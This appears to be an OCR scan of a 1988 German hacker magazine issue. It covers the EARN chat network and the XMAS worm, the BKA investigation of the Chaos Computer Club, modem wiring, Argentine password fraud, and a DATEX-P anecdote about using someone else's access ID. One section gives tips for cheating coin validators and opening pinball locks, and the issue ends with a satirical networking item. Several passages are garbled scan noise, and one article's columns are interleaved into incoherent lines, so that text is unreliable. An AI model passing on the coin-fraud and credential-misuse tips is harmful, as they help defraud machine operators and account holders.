daß ich wohl gegen die EARN- R ichtlinien verstoßen 
habe. Mit diesem Aha-Erlebnis wurde ich bei dem 
Besitzer des Login vorstellig. Er war genau einmal 
bei EARN gewesen, und da hatte er nichts getan. 
Eine suspekte Angelegenheit. Glücklicherweise 
bekam ich zwei Tage später durch eine Vorlesung 
ein eigenes Login für die Siemens. 

Ein weiterer Versuch, mich bei DEARN einzulog¬ 
gen brachte den gewünschten Erfolg. Auch der näch¬ 
ste Befehl - /signon Nickname channel - klappte 
hervorragend. Dann brach das Chaos auf meinem 
Bildschirm aus. Irgendwie sah es aus, als würden 
hunderte von Leuten gleichzeitig in einer Mailbox 
miteinander reden. Nun, cs waren etwa 30 Leute, die 
sich eingeloggt hatten. 


Something about EARN 


EARN ist ein europäisches Datennetz zum Aus¬ 
tausch von Informationen und Programmen. Prak¬ 
tisch heißt das, man kann auf dem Netz direkt mit 
anderen Leuten chatten. Nicht nur mit Leuten, die 
sich bei EARN-Relays einloggen, sondern mit je¬ 
dem, der sich an einem Relay einloggt, da zu anderen 
Netzen Querverbindungen existieren, weltweit etwa 
1300. Neben Europa und USA auch Exoten wie 
Canada, Mexiko, Israel und Japan. 

Allerdings ist das zu einem gewissen Maße Theorie, 

S>«lcttSH)leuicr 


da die Netze eine nette Eigenschaft haben; Sie bre¬ 
chen gern zusammen. Zwischen den Relays liegen 
die Kabel bzw. Satellitenverbindungen, die allseits 
bekannten Links, und die beliebteste Fehlermeldung 
lautet 'Link Failure on xxxxx to yyyyy path’ (Kurz 
LF). Wer einen EARN-Anschluss benutzen kann, 
sollte sich von EARN die Hilfsliste schicken lassen. 
Auf gut VM/CMS heißt das: Teil Relay at DEARN 
/help’. 

Zum Beispiel kann man mit/who abfragen, wer sich 
gerade auf EARN aufhält. Diese Informationen sind 
sehr strukturiert. Jemand von ’TAUrelay’ kommt 
aus Israel. Jemand von ’Germany ’ kommt aus Deut¬ 
schland (oder auch nicht). Jemand mit der Meldung 
’Geneva’ kommt meistens aus Irland. Zum Reden 
stehen die 'Public Channels' zu VeiTügung. Das sind 
die Kanäle 0 bis 99. Will man privater reden, wech¬ 
selt man zu einem Kanal zwischen 100 und 999. 
Diese werden bei Abfragen von /who nicht ange¬ 
geben, Es gibt noch die Kanäle zwischen 1000 und 
9999. Aber die sind nur besonderen Leuten Vorbe¬ 
halten. 


Die Anslandsregeln 


Es gibt auch Richtlinien zur Benutzung von EARN; 

- man darf nicht auf einen privaten Kanal wechseln, 
wenn dieser besetzt ist 

- man darf keine Zeichensatz-Bilder schicken 

- man darf nicht hart fluchen und schmutzige Witze 
erzählen 

- man sollte Englisch reden 

- man darf nicht hacken. 

Es gibt noch andere Möglichkeiten auf EARN. Zum 
Beispiel kann man sich auch an andere Relays wen¬ 
den. Man darf sich zwar nicht einloggen, aber man 
kann erfragen, wer sich dort so tummelt. Möchte 
man jemanden anchaiten, kann man ihn dann über 
BITNICAJNINET rufen. Dafür tippt man einfach 
Teil Userid at Standort’. 

Auf diese Weise erreicht man auch Leute, die nor¬ 
malerweise nicht in EARN sind. Derzeit ist das z.B. 
die einzige Möglichkeit, das Wetter in Tokyo zu 
erfragen. Aber man kann natürlich auch Mailbox¬ 
ähnliche Systeme erreichen. Das bekannteste ist da 
wohl CSNEWS at MAINE. Dort kann man sich alles 
schicken lassen, von PD-Software bis zum Gedicht 
des Tages. Ein andere Box ist UH-INFO, mit den 
Subservem Arpanet und Atarinet. 

Seite 12 


Anfang Dezember ’87 wurde der Deutsche Hauptk¬ 
noten von Darmstadt nach Bonn verlegt. Außerdem 
wurdedie Leitungen von 24(X) Baud auf 9600 Baud 
erhöht. Nachdem DEARN wieder aktiv war, merkte 
man das sofort: Die LF kamen viel schneller. 
Geschwindigkeit ist bei EARN so eine Sache. Man 
kann Glück haben, und die Anwort ist vor der Frage 
wieder da. Nachmittags dauenesS Minuten,bisman 
eine Antwort bekommt. Dafür hat man morgens ein 
reines Vorort-Gespräch. Nur Deutsche, Bayern und 
Holländer. 


Der XMAS-Virus 


In der zweiten Dezemberwochc kan es auf dem 
Relay zum ersten GAV (Größter Anzunehmender 
Vireneinsalz). An einem kalten Donnerstagmorgen 


1 STOP (9t 

2 Voi-"* 

■3 COX« S» 

j| 

hl'coivs V ^ r~ 

J i ONIY COIX «ElEAJI 

»Oß vOCa; CAi,i.S 

lONC 

O-SfANCt b 
Oi«fCT0«T 
ASSlSSAXCt 

»idSi sn 
INS’AVCTIOXS 

EMeSGtNCTO 

■ WAlTtOOOlAl <OX< 

f Ot»OSi' »« 

V S tVn > 

) OlAl XUM»l* 

1 WAIT (oa EtlAl TOst 

2 P>Ai oafKATO» 

xo cevvs itlDlO 

\{iO))un'7*72\ 

□ s m 

00S 

HOB 

0 0 0 _ 

( *Ön tON(5 DiSTAACt CAU5 ^ 

1 LiSrcM ro» oiAt. TOM 

1 PIAI A<5 <;mown BFlOW 1 

CWJWX'.. 

«OWfjrff 

US COWSOft* 

STATiOx’O > '*ML>C0a<ia 

rr-ee . ■xlOuaa«!» e-xc 

All ►ojTiojj® a.»»i«COT •*«: 

C»«>*T0<I «irii «0»'l ox i»il»rTt» 


bekam ich ein File names XMAS. In meinem ju¬ 
gendlichen Leichtsinn startete ich es. Erst sah ich 
einen Weihnachtsbaum und dann zirka 30 Fileende- 
Befehle. Das Programm ging meine Namensliste 
(diese existiert auf allen VM/CMS Rechnern und 
kann erweitert werden) durch und sendete sich selbst 
an die Leute. 


Geile 13 


Es gibt zwei Möglichkeiten, mit XMAS umzugehen. 
Entweder man läßt ihn gewähren und hat dann eine 
formatierte Platte. Oder man drückt Reset, dann 
braucht man eine Stunde, bis man durch einen Ope¬ 
rator wieder Zugang zu seinem Rechner hat, 24 
Stunden später konnte man sich einloggen wo man 
wollte, egal ob Europa oder USA, alles redete über 
XMAS und wünschte dem Programmierer wenig 
Nettes. Die Variablennamen waren übrigens 
Deutsch. 

In den folgenen Tagen mußte man das Relay in Ruhe 
lassen, da durch das ständige Übertragen von XMAS 
das Netz stark verlangsamt wurde. Interessant zu 
bemerken:'Eine Warnung in die USA hat die Ope¬ 
ratoren dazu veranlaßt, in die Header der Relay- 
Messages eine Wamug einzubauen. Eine Warnung 
an den Deutschen Operator brachte keine Reaktion. 


Wer gEARN möchte 


Der Zugang zu EARN wird in Deutschland ziemlich 
unterschiedlich gehandhabi. In Hannover und Ham¬ 
burg wird dieser Zugang generell nicht erlaubt. In 
Heidelberg und Oldenburg kann jeder Student ans 
Netz. Sinnlos istEARN sicher nicht. Man lemtLeute 
kennen und man bekommt Informationen. Wer al¬ 
lerdings auf billige Software hofft, hat keine Chance. 
Der normale Chattcr ist ein Student der Naturwis¬ 
senschaften ohne Computer. Sie kennen zum Teil 
nicht mal den Unterschied zwischen Bit und Byte. 
Aus manchen Universitäten und Instituten schalten 
sich zu mehr als S0% nur Mädchen zu. Komisch, 
wenn man bedenkt, wie selten diese an Computern 
zu finden sind. 

Falls ihr mehr Uber EARN wissen wollt; Ich bin ganz 
einfach zu erreichen: Teil 98B030 at DOLUNIl 
Text. Dann habt ihr mich meistens am Hörer. Es sei 
den ihr bekommt wieder ein LF on DHVRRZNl lo 
DOLUNIl path. Dann habt ihr Pech gehabt. 


Terra 




SmtcnSdjIcubct 






BKA unter Fahndungsdruck 


CCC (HamburgAViesbaden) - Über vier Monate 
sind vergangen, seitdem das Bundeskriminalamt 
(BKA), mit in der Bundesrepublik beispielosen 
nächtlichen Hausdurchsungen, die Jagd auf ver¬ 
meintliche Hacker beim Hamburger Chaos Com¬ 
puter Club e.V. (CCC) eröffnete. 

Mitte September trat der Club mit Informationen an 
die Öffentlichkeit, dieein eklatantes Sicherheitsloch 
in einem Großrechnerbetriebssystem der Firma Di¬ 
gital Equipment belegten. .Jlncked' hatten sich an 
den Club gewandt, nachdem es ihnen gelang, in circa 
135 Computersysteme des wissenschaftlichen In¬ 
formationsnetzes der Luft- und Raumfahrt sowie der 
Hochenergiephysik einzudringen. 

Mittels sogenannter „Trojanischer Pferde“ unter¬ 
gruben sie die Sicherheitsroutinen und installierten 
unter anderem Programme, die die Kennworte aller 
Nutzer auskundschafteten. Betroffen von diesem 
,JIack“ waren neben der amerikanischen Raum¬ 
fahrbehörde NASA führende Institute im neun west¬ 
lichen Ländern. 


Raubkopien auf Großrechnern 


Bei der durch den Club sofort nach Bekanntwerden 
eingeleitetcn „Schadensbegrenzung“ wurde neben 
dem Hersteller auch der amerikanische Geheim¬ 
dienst CIA informiert. Man wollte, so ein Club- 
sprccher, vermeiden, daß der Club sich aufgrund der 
Brisanz der betroffenen Systeme zum Spielball der 
Geheimdienste entwickelt. So war es selbstver¬ 
ständlich, daß vor einer Veröffentlichung die be¬ 
troffenen Systeme wieder „gesichert“ werden mu߬ 
ten. 

Beim Vergleich der von den .Hackern“ angefenig- 
ten Liste der betroffenen Computer mit der Liste des 
Herstellers ergaben sich jedoch zahlreiche Unstim¬ 
migkeiten. So wurden an führenden Forschungs¬ 
einrichtungen, auch im Bundesgebiet, auf dem se- 
cond hand Markt erworbene Großrechner ohne Li¬ 
zenz betrieben. Gemeinhin wird soetwas als „Raub¬ 
kopie“ bezeichnet. 

Als Folge der Veröffentlichung dieses ,Hacks“ be¬ 
sannen sich die Wiesbadener Polizeispezialisten 
einer Anzeige der französichen Niederlassung der 
Philips AG. Diese hatte im Herbst 1986 - nachdem 
der Gesetztgeber in der Bundesrepublick das Aus¬ 
spähen und Verändern von Daten unter Strafe stellte 
- Anzeige erstattet. Nach Angaben von Philips waren 

Snfeiiädjlcubcr 


Hacker in die Fertigungssteürung cingedmngcn. 

Die Ermittlungen der französischen Behörden führ¬ 
ten in die Schweiz zum Genfer Kemforschungs- 
zenirum CERN. Dieses beklagt schon seil 1984 
ständig Einbrüche durch Hacker. Unter den Hackern 
selbst gilt CERN als die .Huropäische Hackerfahr¬ 
schule“ in der sich die Hacker „die Klinke in die 
Hand geben“. Die schweizerSystemspezialisten äu- 
ßertenden Ermittlungsbehörden gegenüber den Ver¬ 
dacht, daß der Hamburger Chaos Computer Club 
Verursacher dieser Einbrüche sei. 

So erwirkte die Staatsanwaltschaft, einen Tag nach 
Veröffentlichung des Nasa-Hacks, die ersten Durch¬ 
suchungsbeschlüsse. Inzwischen wird gegen sieben 
„Computerfreaks“ aus dem Umfeld des CCC, in¬ 
zwischen auch wegen des publiziertem NASA- 
Hacks, ermittelt. Begleitet wurden die Ermittlungen 
durch ebensoviele Hausdurchsuchungen, bei denen 
umfangreiches Material sichergestellt wurde. 


MegaChip 

NETWORKE^G 


Hart getroffen wurden durch die Ermittlungen die 
beiden Vorstandsmitglieder des Clubs. Beide sind 
auch journalistisch tätig. Steffen Wemery unterhält 
seit 1984 einen Informationsdienst im Bildschirm¬ 
textsystem der Post. Beiden Durchsuchungen wurde 
das Redaktionssystem sichergestellt, so daß der 
Dienst nicht mehr fortgeführt werden konnte. Zwei 
Monate allein benötigten die Spezialisten vom 
BKA, um eine Kopie der für die Fortführung des 
Dienstes benötigten Daten anzufertigen. Inzwischen 
sind auch Computerteile zurückgegeben worden. 
Dabei wurde festgestellt, daß die Ermittlungen durch 
unsachgemäßen Umgang mit den Gerätschaften und 
einem daraus resultierenden Geräteschaden verzö¬ 
gert wurden. -r. 


hoffnungslose Bestrebungen 


Seit der letzten Durchsuchung sind knapp vier Mo¬ 
nate vergangen. Bis zum heutigem Tage wird den 
Anwälten der Beschuldigten die Akteneinsicht ver¬ 
wehrt. Das B KA und die Staatsanwaltschaft tun sich^ 

Seite 14 


schwer Licht in das Dunkel dieses Falles zu bringen. 
Mag auch das sichergestellte Material an Umfang 
zwar zugenommen haben, so scheinen die Spezia¬ 
listen vom BKA nicht in der Lage zu sein ihre 
Vorwürfe zu präzisieren und zu belegen, 

Die Hoffnungslosigkeit der Bestrebungen des B KA 
wird ersichtlich wenn man Hintergründe eines wei¬ 
teren Verfahrens miteinbezieht. So wird gegen den 
Pressesprecher des Clubs, welcher nach internen 
Informationen einer der Haupiverdächtigen sein 
soll, seit eineinhalb Jahren wegen des Verdachts auf 
Verstoß gegen das Fernmeldeanlagengesctz er¬ 
mittelt. Normalerweise werden geringfügige Ver¬ 
stöße, bei gleichzeitig erhobenen schwereren Vor¬ 
würfen, eingestellt. So jedoch nicht in diesem Fall. 
Denn in der Ermittlungsakte findet sich ein Ver¬ 
merk, daß eine Anklage oder Verurteilung in den 
Ermittlungen des BKA kaum zu erwarten sei. So ist 
es zu erklären, daß die Hamburger Staatsanwalt¬ 
schaft zunächst das geringfügige Verfahren weiler¬ 
verfolgt. 

Doch mit einer baldigen Einstellung des Hacker¬ 
falles ist nicht zu rechnen. So ist zu vermuten, daß 
gerade die französichen Ermitilungsbehörden die 
Deutschen kräftig unter Druck setzen, jetzt endlich 
einen mutmaßlichen Täter zu präsentieren und zu 
überfuhren. Der Fahndungsdruck wird weiter erhöht 
- Insider bezweifeln allerdings den Erfolg. 

So stellten schon die Hamburger Hacker fest: Der 
Gesetzgeber hat cs versäumt, mit Einführung der 
Straftalbestände auch für die nötige Ausbildung der 
Ermittlungsbehörden zu sorgen. So fehlt cs dem 
BKA an Kompetenz und Augenmaß in dieser Sache. 
Eine Chance, so die Hacker, der wirklich gefährli¬ 
chen Computerkriminalität Herr zu werden, haben 
die Computerspezialisten des BKA vertan. 


S.Wernery 062106 Feb SS BEREICH RED BKA DRUCK 
CLINCIIIDS-REDIS.WERNERYI07.02.88I15:5II56HZ. 



Snlcnörftlcubcr 


Modemanschluß 

Die Modem-Anleitung sagt über den Anschluß 
nichts Wichtiges aus, sondern ist (wegen der 
USA-Normen) eher etwas konfus. 

Es reicht aber der 2 Draht-Anschluß, wie er bei den 
meisten Hauptanschlüssen auch verwirklicht wird, 
jedenfalls bei den ,.alten“ (neu heißt; Spezialstecker 
für ISDN, darüber weiß ich nix, dürfte aber nur neuer 
Stecker sein). Dort gehen aus der Wand 4 Drähte 
raus, entweder steckbar (4 Pin-Stecker) oder so, daß 
man einen Deckel abschrauben muß und (z.B.) ein 
lO-Meter-Kabel mit den Poststeckem (flach, rech¬ 
teckig, durchsichtig) einfach angeschlossen werden 
kann. Wenn man sich den Stecker ansieht, sind dort 
nur 3 Kabel drin. Davon sind bei einer „normalen“ 
Anlage (1 Hauptanschluß, keine Nebenstelle) nur 2 
Kabel wirklich angeschlossen: die beiden, die direkt 
nebeneinander liegen. Nur diese beiden sind auch 
wirklich wichtig, das Modem erkennt Klingeln - das 
deutsche Besetztzeichen usw. erkennt es leider nicht. 
An dem Modem ist ein einfaches, 4-poIiges Kabel. 
Es werden nur die rote und die grüne Leitung ge¬ 
braucht, die anderen kann man abschneiden. Jetzt 
stellt sich die Frage, ob man immer umslecken will 
(oh weil) oder umschalten oder alles (Teflon und 
Co.) immer dranlassen will. Das Modem hat noch 
einen zweiten Anschluß, an dem ein USA-Telefon 
(Stecker-Nomn) .so angeschlossen werden kann, daß 
immer, wenn das Modem aus ist, von dort aus tele¬ 
foniert werden, und außerdem mit den Modem- 
Befehlen auf Telefon (Voice) und zurückgeschaltet 
werden kann. Dazu eignet sich gut ein ganz einfaches 
Telefon vom Conrad-Electronic-Grabbeltisch für 
ca. 20 DM (ohne den Stecker!). 

Ich habe es etwas anders gemacht: Ich habe 2 Um¬ 
schalter 1 2 pol & 1 pol) so mit dem ganzen Kram 
verlötet, daß ich entweder nur Post (2 polü) also 
normales Teflon dranhabe, oder Nicht Post, d.h. 
entweder Modem oder Ami-Phone (s o. von Con¬ 
rad), überden 1-poligen Umschalter, der andere Pol 
liegt bei Modem & Phone gleichzeitig an. In das 
Ami-Phone hab ich außerdem noch einen Schalter 
eingebaut, mit dem sich das Mikro ausschalten läßt. 
Dadurch, daß das das Ganze steckbar gemacht wurde 
(6 M-Kabel vom Conrad), ist die Chose höllisch 
schnell abbaubar: Wandsockel auf, Kabel raus, Ge¬ 
häuse des Umschalters auf. Stecker (Original-Post- 
Teflon!) raus, diesen Stecker in den Wandsockel, 
Deckel anschrauben - fertig. Das 10 M-Kabel kann 
die Pest m.E. nicht messen, der Rest ist immer nur 
dran, wenns gebraucht wird. 

Legalize private Modems! 

Seite 15 



Im folgenden ein Artikel aus LA RAZON - {argentinische Tageszeitung, vor 76 Jahren gegründet, 3 Ausgaben I 
täglich (7). eine der drei wichtigsten Zeitungen des Lundes) - gefunden von Stefan Weirattch, übersetzt von 
Rena Tangens. 

La Razon 

Freitag, 25.September 1987 

Interpol argentinischen Hackern auf der Spur 

Laut Bericht von Alberto A. Antonucci, einem der Ein eingetragener Benutzer kann obendrein das 

Direktoren, wurde die Firma siscoTEL s.a. (s.a. = Passwort alle fünf Minuten ändern, wenn es ihm 

Aktiengesellschaft), in unserem Land Eigentümerin paßt. Außerdem bricht Delphi die Verbindung ab, 

von DELPHt - Anbieterin von Datenbank, Telekom- wenn jemand es ausprobiert und das System dreimal 

munikation und anderer Dienste - wurde also seine hintereinander nicht das richtige Passwort erkennt. 

FirmaübereinenZeitraumvonsechsMonatenOpfer Wenn beim fünften Anruf, also dem fünfzehnten 
einer Aktion von Hackern und dabei um einige Versuch, nicht die richtige Kombination kommt - 

zehntausend Dollar geschädigt. Mittlerweile sei In- mathematisch gesehen gibt es Millionen möglicher 

terpol eingeschaltet und die Untersuchungen weit Kombinationen - legt das System nicht nur auf, 

fortgeschritten, da bereits die Empfänger der Plau- sondern sperrt auch gleich den Account und fordert 

dereien von Computer zu Computer entdeckt wor- den Benutzer zu einer Erklärung auf bzw. zeigt ihm 

den seien, die via Telefon und unter der Benutzung an, daß irgendjemand versucht, einzudrtngen.“ 
des geheimen Passwortes, das entel (örtliche Te- —————— 

lefongesellschaft) an Delphi als Benutzer dieser Zwei junge Deutsche aus Hamburg 
Dienstleistungen vergeben hatte. ,X)ie letzte Rech- —— 
nung, die wir bekamen, belief sich auf Uber 10.0(X) Das Thema der Informationspiraten genannt ’Hac- 

US Dollar“, bestätigte Antonucci, nachdem er die ker’ wurde sofort wieder aktuell, als vor einigen 

Praktiken der staatlichen Firma erläutert hatte. Tagen zwei junge Deutsche aus Hamburg einem 

——deutschen Wochenmagazin ein Interview gaben und 
Der Schakal erzählten, daß sie, ebenfalls via Telefon, in das 

■ ■ '■■■' Telekommunikationsnetz der NASA, das insgesamt 

Andererseits kommentiene er den Artikel, der in >33 Knotenrechner in Europa und Asien umfaßt, 

einer anderen Tageszeitung erschienen war und in eingedrungen seien. Das nordamerikanische Un- 

dem ein einheimischerHackerporträtiert wurde, der ternehmen, ein japanisches und digital - eine der 

auf den Decknamen 'Schakal’ hört. Er berichtete, Firmen, die das größte Ansehen genießt in der Ent- 

daßerundseineKollegenimBesitzderpersönlichen Wicklung von sicherer und leistungsfähiger Soft- 
Passworte von vielen Benutzern von DELPHI seien wäre für diese Art der Telekommunikation - haben 
und damit heimlich von allen Diensten Gebrauch Eindringen bestätigt. „Seil Belriebsaufnahme 

machen könnten „und damit ahnungslosen Benut- von Delphi haben wir hier vier Fälle gehabt“, räumte 

zern ungeheure Rechnungen aufbürden.“ Antonucci ein, ,,und bei allen gab es - unglückli- 

Antonuccis Widerspruch ist ganz grundsätzlich: cherweise für den jeweiligen Teilnehmer, glückli- 

,U.assen Sie uns bitte nicht in den Bereich von cherweise für uns - leicht zu entdeckende Fehler bei 

Science Fiction oder irgendeiner anderen Art von der Benutzung dieser Dienste. Wenn gesagt wird, 

Aberglauben gehen. Dieser Typ Hacker, den einige daß das Passwort geheim ist, wollen wir damit sagen. 

Veröffentlichungen, nicht nur in unserem Land, ent- daß es geheim sein muß, es darf nur einer wissen und 

werfen, existiert nicht. Wissenschaftlich gesehen sonst niemand.“ 

kann er gar nicht existieren. Unser System hat zwei 

'Eintrittskarten': derName, den derTeilnehmerver- unbegreiflich0 Rechnungen 

wendet - das kann der richtige Name oder auch ein “ 

Deckname sein - und das Passwort. Das erste ist nicht Danach erzählte er la razon, daß demgegenüber der 
schwierig zu ermitteln, da einer Benutzerliste exi- Betrug, der jetzt entdeckt wurde, seinen Ursprung in 
stiert. Das zweite ist eine Kette oder eine Folge von einer Computer- und Telekommunikationsausstel- 
Buchstaben und Zahlen zwischen 6 und 33 Stellen. lung letzten Jahres hat, die jährlich in einem ruhigen 

0Alcii£d|lcHi)cr 



Seite 16 


Hotel durchgeführt wird. ,,Wir brauchten eine spe¬ 
zielle Telcfonleitung für unseren Mes.sestand, um 
Dienste vorführen zu können, die DELPHI USA dort 
anbieten,“ erklärte Antonucci, „Dieser Telekom- 
rnunikationsservice wurde uns im Mai eingerichtet 
und zwei Monate später hörten wir auf. ihn zu be¬ 
nutzen und die Ausstellung war beendet. Ab De¬ 
zember letzten Jahres und fortschreitend bis März 
diesen Jahres gab es dann einige unbegreifliche 
Rechnungen. An diesem Punkt erstatteten wir An¬ 
zeige. Zum Beispiel schien es so, als ob wir am 1. 
Januar dieses Jahres die Leitung nach Kanada von 
11.30hbis 15.00 h benutzt hätten. Aber von 12.00 
h bis 14.00 h desselben Tages gab e.s eine andere 



Verbindung von uns, und zwarmitder Schweiz und 
schließlich eine weitere ab 13.00 h bis 17.00 h mit 
einem anderen europäischen Land. Ganz offen¬ 
sichtlich sind Zuschauer während der Ausstellungen 
am Me.ssesland gewesen, die die Fingerbewegungen 
des Votführenden auf der Tastatur beobachtet ha¬ 
ben, denn das Passwort ist nicht auf dem Bildschirm 
zu sehen, und haben auf diese Weise den Code 
herausgefunden. Auf der anderen Seite müssen wir 
zugeben, daß die Handhabung dieser Passwone 
nicht gerade vorbildlich war. Sie wurden einem 
Angestellten xy anvertraut, der sie daraufhin in 
einem Buch notierte, zu dem jeder andere Ange¬ 
stellte Zugang hatte; ein so wenig geheimer Dienst¬ 
weg macht Passworte nutzlos. DerTyp 'Hacker', der 
die Informationen auf diese Weise ausfindig macht, 
existiert tatsächlich. Hingegen ist der Mythos vom 
Hacker, der die Passworte allein herausfindet und 
dem kein System widerstehen kann, sympathisch, 
aber mehr nicht. Delphi zählt auch weiterhin auf die 
Technologie von DIGITAL, die eine der besten der 
Welt ist.“ 


CLINCHIPADELUUNIPADEIUUNI22.01.88116:3615754 2. 

SiilciiSdjIciibcr 


Unglaublich aber wahr 

Geschichten aus DATEX-P 

Gut ein Jahr ist’s her. Ich will anmerkeii.daß ich 
zum Zeitpunkt des Vorfalls im Vollbesitz meiner 
geistigen Kräfte war. Ich habe grade mal wieder 
'ne Public Domain-NUIin die Hände bekommen 
und will mich mal ’n bißchen im DX umschaucn. 
Zwei der frei belegbaren Funklionstasten meines 
Terminalprogrammcs sind mit Teil A und B der 
NUI belegt, aufeiner dritten habe ich die-wie sich 
später rausstellte fehlerhafte - NUA irgend eines 
britischen Rechners gelegt. 

Ich klingle den PAD HH an. ein Ferngespräch. Ich 
wohne in der Provinz, eine Fangschaltiing o.ä. ist 
damit wohl ausgeschlossen. Der PAD piept, ich lege 
den Tcflonhörer in meinen wunderbaren postzuge- 
lassenen (!) Akustikkoppler, gebe das Dienstanfor¬ 
derungszeichen ein, der PAD meldet sich. Teil A und 
B meiner Tlkng werden akzeptiert, in froher Er¬ 
wartung drücke ich auf meine dritte Funktionstaste. 
Der PAD antwonet mit “Kein Anschluß unter dieser 
Nummer“ oder so. 

Sekundenbruchleilc später, ohne weitere Meldung, 
schickte der PAD die Zeile “Hallo Hacker!“ auf 
meinen Bildschirm, gefolgt von einer nicht enden 
wollenden Sequenz aus BELsü Bleich vor Schreck 
fiel ich fast von meinem Bürostuhl. Als ich mich 
Sekunden später wieder gefaßt h,atie, hechtete ich in 
Richtung Teflon und drückte mit einem karateähn¬ 
lichen Handkantenschlag auf die Gabel. Etwas spä¬ 
ter, als der Schreck verflogen w.ir, rief ich den PAD 
noch mehrmals an, um den Vorfall zu reproduzieren. 
Ohne jeden Erfolg. 

Der Vorfall liegt schon länger zurück. Hat vielleicht 
dennoch jemand irgend eine Erklärung? Neben der 
naheliegenslen (Hallus etc.) fällt mir nur noch die 
sehr unwahrscheinliche ein, daß jemand mein Te¬ 
lefon angezapfl und sich in die Leitung rcinge- 
schaltet haben könnte. Das würde ich zwar der Post 
und Komplizen sofort Zutrauen - sie machen’s ja 
auch des öfteren - nur würden sie sich nicht freiwillig 
derartig preisgeben. WAS IST DA BLOSS PAS¬ 
SIERT? 

Ein mit DX befaßter befreundeter Postler erklärte 
mir übrigens, daß so etwas nicht möglich sei, beeilte 
sich aber hinzuzufügen, daß Unmöglichkeit kein 
Grund dafür sei, daß es nicht dennoch passiere. In 
DX sei allerhand Unmögliches möglich.... 

CLINCH/SYSOP/GAST/26.10,87/21 .'30/2885 Z. 


Seite 17 







Münzprüfer 

“For amusement only" 


Es gibt verschiedene Arten von MDnzprüfern. 
Während Flipper und Video-Spiele auswechsel¬ 
bare, ziemlich kleine Prüfer haben, welche immer 
nur einzelnde Münzen (1/2/S DM) prüfen, sind in 
Geldspielgeräten (“Daddelmaschinen“) umfan¬ 
greichere, welche die Münzen sortieren & prüfen. 
Diese können auch 10-Pfennig-Münzen prüfen. 

In Fahrausweisautomaten sind komplexere Prüf¬ 
vorrichtungen vorhanden, die schon etwas mehr 
Wert auf die Echtheit der Münze legen (hier wird 
Z.B, auch auf Rändelung überprüft). Bei ziemlich 
allen eingesetzten Geräten mit Münzprufem werden 
die 5 Pence-Stücke (England) immer noch als DM 
1.- anerkannt. Vermutlich aus diesen Gruden be¬ 
kommt man bei Banken kein Münzgeld aus anderen 
Ländern. 

Die Flipper/Videospiel-Münzprüfer erkennen z.B. 2 
1/2 Gulden Münzen (Holland) öfters als 5 DM an. 
Auch Ringe in entsprechenden Größen (wie z.B. aus 
Kaugummiautomaten in Bahnhöfen) werden bei 
diesen Prüfern noch als 1 DM - selten 2 DM - nach 
etwas Behandlung (Klebeband!) akzeptiert. Hier 
liegt allerdings möglicherweise schon eine Fabri¬ 
kation von Falschgeld vor, die, wie auf jedem Geld¬ 
schein deutlich zu lesen, mit nicht unter zwei Jahren 
Knast belegt wird. 

In den Bedienungs-Anleitungen von Geldspielge¬ 
räten taucht öfters der Satz auf: “Größtmögliche 
Prüfsicherheit ist nur gewährleistet, wenn der Mag¬ 
net und die Gegenfläche der 5 DM-Laufbahn sauber 
und frei von Metallspäne sind“. Ebenso wird hin¬ 
gewiesen: “Auf keinen Fall fetten oder ölen“, da 
sowas nämlich leiten kann. In Japan gehen derzeit 
einige Aufsteller von Zigarettenautomaten langsam 
in den Ruin, weil ihre Automaten schon bei dem 
kleinsten Ölspritzer (und sei’snurSalatöl) MUnze(n) 
gezählt zu haben meinen. Generell: “Sollte das Gerät 
nicht lot- und waagerecht aufgestellt sein, oder eine 
Falschmünze wird häufig vom Prüfer angenommen, 
so kann der Fehler durch Justage behoben werden.“ 
T^ink. 

Ältere Williams-Flipper zählen angeblich etliche 
Freispiele, wenn man sie etwas anhebi und dann 
wieder der Schwerkraft überläßt. Zum Thema Flip¬ 
per: Im Gegensatz zu Videospielen, die Schlösser 
mit Rundkopfzylinder aus ausländischer Fabrika¬ 
tion benutzen, sind Flipper-Schlösser simpel und 


dementsprechend schlecht gesichert. Die Entwick¬ 
lung schreitet zwar auch im Hinblick auf die Si¬ 
cherheit voran, aber manche sollen immer noch mit 
einerumgebogenen Büroklammerzuöffnen sein. Im 
Gegensatz zu sonst 

üblichen Verfahren ist die Aufschließrichtung links 
herum. Ausnahmsweise hier einmal ein echtes Lob 
an die deutsche Bundespest: diese setzt Prüfer aus 
(relaüv) eigener Produktion ein, welche wesentlich 
mehr Sicherheit bieten. Gerüchteweise hört man 
zwar von 5 Drachmen-Münzen (Griechenland), wel¬ 
che bei älteren Teflonzellen als 1.- DM durchge- 
lassen werden. Und die Moral von der Geschieht: 
Laß prüfen deine Muenzen nicht. 


Andy 

8712052045 MUNZDS24.DOC Ls 16 



HyperNet 


Xerox kündigt Hyper-Ethernet an 


SAN FRANCISCO, CA.; Jan. 7, 2010 - Xerox 
kündigte heute Hyper-EherNet an, das Local 
Area Network der vierten Generation. Zusätzlich 
zur Übertragung von Text, Daten und Bildern 
bietet Hyper-EtherNet die Möglichkeit der Über¬ 
tragung von Leuten. 

Folgt UM Michael Liddle, Chef von Office Systems, 
dann wird “die Übertragung von Leuten via Hyper- 
EtherNet den Andrang vor Aufzügen wesentlich 
reduzieren und Video-Konferenzen unnötig ma¬ 
chen.“ Bestellungen für das Hyper-EtherNet werden 
ab dem nächsten Monat angenommen. Die Instal¬ 
lation wird ab dem dritten Quartal in Us Angeles 
beginnen. 

Salcn$i()Iciifccr 


Im Hauptquartier der Wang Laboratories in Hobo- 
ken, New Jersey, wird ebenfalls an einem neuen Netz 
gearbeitet, dem Super-Hyper-WangNet, einem Lxi- 
cal Area Network der zwölften Generation. Laut 
Freddie Wang, Präsident der Wang Labs, “kann man 
mit WangNet nicht nur Leute übertragen, sondern - 
überlntcrconnect- und Utility-Verbindungen - auch 
Möbel und Gebäude. Diese zusätzlichen Möglich¬ 
keiten des Super-Hyper-WangNet werden für das 
Büro der Zukunft von entscheidender Bedeutung 
sein“. Bestellungen für das Super-Hyper-WangNet 
werden ab nächstem Monat angenommen. Installa¬ 
tionen haben bereits weltweit begonnen. 

Die IBM-Corpoiation, die ein Local Area Network 
gerüchleweiseseit 1980 ankündigt, warnicht bereit, 
dazu einen Kommentar abzugeben. 

DECNet Phase XVIII 


TEWKSBURY, MA; April 1,2010-Digital Equip¬ 
ment stellte heute ihre neue DECNet Phase XVIII- 
Architekturvor. AlsEnigegnungaufEniwickiungen 
von Xerox und EtherNet-Erweiterungen von Wang, 
durch die man Leute und Sachen über Internode- 
Links verschicken kann, bieiet auch DEC’s neuestes 
DECNet diese Features, und darüber hinaus die 
Erzeugung virtueller Möglichkeiten bis hin zu vir¬ 
